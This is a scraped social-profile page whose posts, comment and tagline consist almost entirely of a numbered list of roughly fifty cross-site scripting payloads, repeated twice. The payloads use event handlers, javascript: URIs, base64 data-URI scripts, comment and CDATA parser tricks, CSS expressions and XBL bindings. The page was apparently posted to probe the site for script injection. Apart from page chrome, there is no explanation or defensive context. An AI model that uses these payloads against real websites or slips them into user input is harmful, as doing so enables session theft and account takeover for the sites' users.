Profile

Cover photo
sfsdf
2,765 views
AboutPostsPhotosVideos

Stream

sfsdf

Shared publicly  - 
 
<form id="test" /><button form="test" formaction="javascript:alert(1)">X
<input onblur=write(2) autofocus><input autofocus>
<video poster=javascript:alert(3)//
<frameset onload=alert(4)>
<body onscroll=alert(5)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<!--<img src="--><img src=x onerror=alert(6)//">
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(7)>X
<video><source onerror="javascript:alert(8)">
<video onerror="javascript:alert(9)"><source>
<body oninput=alert(1)><input autofocus>
<form><button formaction="javascript:alert(10)">X
<comment><img src="</comment><img src=x onerror=alert(11))//">


<math href="javascript:alert(12)">CLICKME</math>
<math>
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(13)">CLICKME</maction>
</math>


<![><img src="]><img src=x onerror=alert(14)//">
<style><img src="</style><img src=x onerror=alert(15)//">
<li style=list-style:url() onerror=alert(16)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(17)></div>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(18)</SCRIPT>
<head><base href="javascript://"></head><body><a href="/. /,alert(19)//#">XXX</a></body>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(20)"></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<b <script>alert(21)</script>0
<div id="div1"><input value="``onmouseover=alert(22)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=alert(23)//'>
<embed src="javascript:alert(24)">
<img src="javascript:alert(25)">
<image src="javascript:alert(26)">
<script src="javascript:alert(27)">
<div style=width:1px;filter:glow onfilterchange=alert(28)>x
<object allowscriptaccess="always" data="test.swf"></object>


[A]
<? foo="><script>alert(29)</script>">
<! foo="><script>alert(29)</script>">
</ foo="><script>alert(29)</script>">
[B]
<? foo="><x foo='?><script>alert(30)</script>'>">
[C]
<! foo="[[[Inception]]"><x foo="]foo><script>alert(31)</script>">
[D]
<% foo><x foo="%><script>alert(32)</script>">

div id=d><x xmlns="><iframe onload=alert(33)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(34)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:alert(35)>XXX</a>
<img src="x` `<script>alert(36)</script>"` `>
<img src onerror /" '"= alt=alert(37)//">
<title onpropertychange=alert(38)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(39)></a>">
<!--[if]><script>alert(40)</script -->
<!--[if<img src=x onerror=alert(41)//]> -->

<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(42)" style="behavior:url(#x);"><param name=postdomevents /></object>

<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(write(43))%7d

<style>*[{}@import'test.css?]</style>X


<?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[alert(44)]]></constructor></implementation></binding></bindings>
<div style=content:url(45.svg)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(46));">X

<script src="#">{alert(47)}</script>;1
<script<{alert(48)}/></script </>
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(49)',384,null,'rsa-dual-use')</script>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(50)"></g></svg>
sfsdf originally shared:
 
<img src=x.png onerror=alert(/1/) />
"><script>alert(/2/)</script>
1
Add a comment...

sfsdf

Shared publicly  - 
 
<img src=x.png onerror=alert(/1/) />
"><script>alert(/2/)</script>
1
1
sfsdf's profile photo
sfsdf
 
<form id="test" /><button form="test" formaction="javascript:alert(1)">X
<input onblur=write(2) autofocus><input autofocus>
<video poster=javascript:alert(3)//
<frameset onload=alert(4)>
<body onscroll=alert(5)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<!--<img src="--><img src=x onerror=alert(6)//">
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(7)>X
<video><source onerror="javascript:alert(8)">
<video onerror="javascript:alert(9)"><source>
<body oninput=alert(1)><input autofocus>
<form><button formaction="javascript:alert(10)">X
<comment><img src="</comment><img src=x onerror=alert(11))//">


<math href="javascript:alert(12)">CLICKME</math>
<math>
<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(13)">CLICKME</maction>
</math>


<![><img src="]><img src=x onerror=alert(14)//">
<style><img src="</style><img src=x onerror=alert(15)//">
<li style=list-style:url() onerror=alert(16)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(17)></div>
<SCRIPT FOR=document EVENT=onreadystatechange>alert(18)</SCRIPT>
<head><base href="javascript://"></head><body><a href="/. /,alert(19)//#">XXX</a></body>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(20)"></OBJECT>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<b <script>alert(21)</script>0
<div id="div1"><input value="``onmouseover=alert(22)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=alert(23)//'>
<embed src="javascript:alert(24)">
<img src="javascript:alert(25)">
<image src="javascript:alert(26)">
<script src="javascript:alert(27)">
<div style=width:1px;filter:glow onfilterchange=alert(28)>x
<object allowscriptaccess="always" data="test.swf"></object>


[A]
<? foo="><script>alert(29)</script>">
<! foo="><script>alert(29)</script>">
</ foo="><script>alert(29)</script>">
[B]
<? foo="><x foo='?><script>alert(30)</script>'>">
[C]
<! foo="[[[Inception]]"><x foo="]foo><script>alert(31)</script>">
[D]
<% foo><x foo="%><script>alert(32)</script>">

div id=d><x xmlns="><iframe onload=alert(33)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(34)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:alert(35)>XXX</a>
<img src="x` `<script>alert(36)</script>"` `>
<img src onerror /" '"= alt=alert(37)//">
<title onpropertychange=alert(38)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(39)></a>">
<!--[if]><script>alert(40)</script -->
<!--[if<img src=x onerror=alert(41)//]> -->

<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(42)" style="behavior:url(#x);"><param name=postdomevents /></object>

<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(write(43))%7d

<style>*[{}@import'test.css?]</style>X


<?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[alert(44)]]></constructor></implementation></binding></bindings>
<div style=content:url(45.svg)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:alert(46));">X

<script src="#">{alert(47)}</script>;1
<script<{alert(48)}/></script </>
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(49)',384,null,'rsa-dual-use')</script>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(50)"></g></svg>
Add a comment...
Story
Tagline
<img src=x.png onerror=alert(/1/) /> "><script>alert(/2/)</script>
Links
Website